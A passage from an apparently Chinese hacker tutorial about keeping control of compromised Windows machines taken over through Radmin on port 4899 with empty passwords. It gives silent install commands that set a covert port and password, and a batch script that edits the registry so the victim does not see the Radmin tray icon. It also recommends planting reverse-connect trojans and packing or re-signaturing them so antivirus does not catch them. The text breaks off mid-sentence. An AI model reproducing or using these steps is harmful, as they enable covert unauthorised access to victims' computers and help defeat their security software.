RAdmin 服务端高级配置.docVIP

对于4899肉鸡,相信大家都不会陌生吧。Radmin远程控制软件最大的优点就是功能齐全，便于操作，能够躲避一些软件的查杀。实在是居家旅行，杀人灭口，绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊？问的好，各大黑客网站均能下载，童叟无欺啊！（这段对白怎么这么耳熟啊？）第一章? ?4899空口令肉鸡争夺战4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000 自动攻击探测机对他感兴趣的某段IP细心的，无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的，绿的怎么吃啊?)既然4899空口令肉鸡这个多，那么偶就先从它的由来说起吧！Windows NT/2000 自动攻击探测机这款扫描软件不但集成了扫描器的特点，还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的，弱口令的和SA空口令的电脑上传并安装远程图形控制软件Radmin，即把R_Server.exe，AdmDll.dll和raddrv.dll这三个文件上传到其电脑系统跟目录%systemroot%\system32子目录下，并行运行R_Server.exe可执行文件。由于远程上传的Radmin没有经过配置，因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图1-1)。这样不就成个此地无银三百两，机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置，一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了，逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了，他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡，这样就大大的不妙了。所以了，这个托盘的隐藏是非常必要和急切的。在做我们的工作之前，要做好一些准备活动。首先把4899空口令肉鸡设置上密码，在Radmin的CMD控件下输入命令r_server.exe /port:520 /pass:hackbase /save /silence。有些同僚总是抱怨这个命令不好用，我看过他们出问题的动画。无论是在CMD命令下或者在“运行”下输入这个命令都是正确的，而他们出错的原因就是没有添加参数“/save”保存，和参数“/silence”后台安装。这样设置好连接端口和密码，同道中人就算用“4899空口令扫描器”扫到你做的肉鸡也晚了，偶已经添加过密码了，而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马放到肉鸡上，以免对方是动态IP，肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊，这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的，这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀，还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳，然后再加个不知名的壳（ASPack, UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了），然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。这样的黑客程序才是我们的杀手锏。??前期工作制作完毕后，您就可以耐心的工作了。为了做到隐藏托盘的目的，偶想了两个办法：第一，? ?在您的机器上事先安装并配置好Radmin，把注册表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin导出为radmin.reg，这个就是绝对符合您意愿的Radmin配置，把radmin.reg上传到对方机器输入命令regedit /s radmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候，任务栏里的Radmin托盘就消失了。第二，? ?写个批处理文件重新调整Radmin配置。批处理文件内容如下：@echo off@r_server.exe /port:520 /pass:hackbase /save /silenceecho Windows Registry Editor Version 5.00 ftp.regecho [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] ftp.regecho DisableTrayIcon=hex:01,00,00,00 ftp.regregedit /s ftp.regdel ftp.reg到这里菜鸟的“保鸡”反击战已经告一段落。刚才我们不是还放了个灰鸽子吗，这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑，还是逃不出如来佛的掌心吧！呵呵，我得意的笑~~~在长期的摸索研究工作中，偶发现个W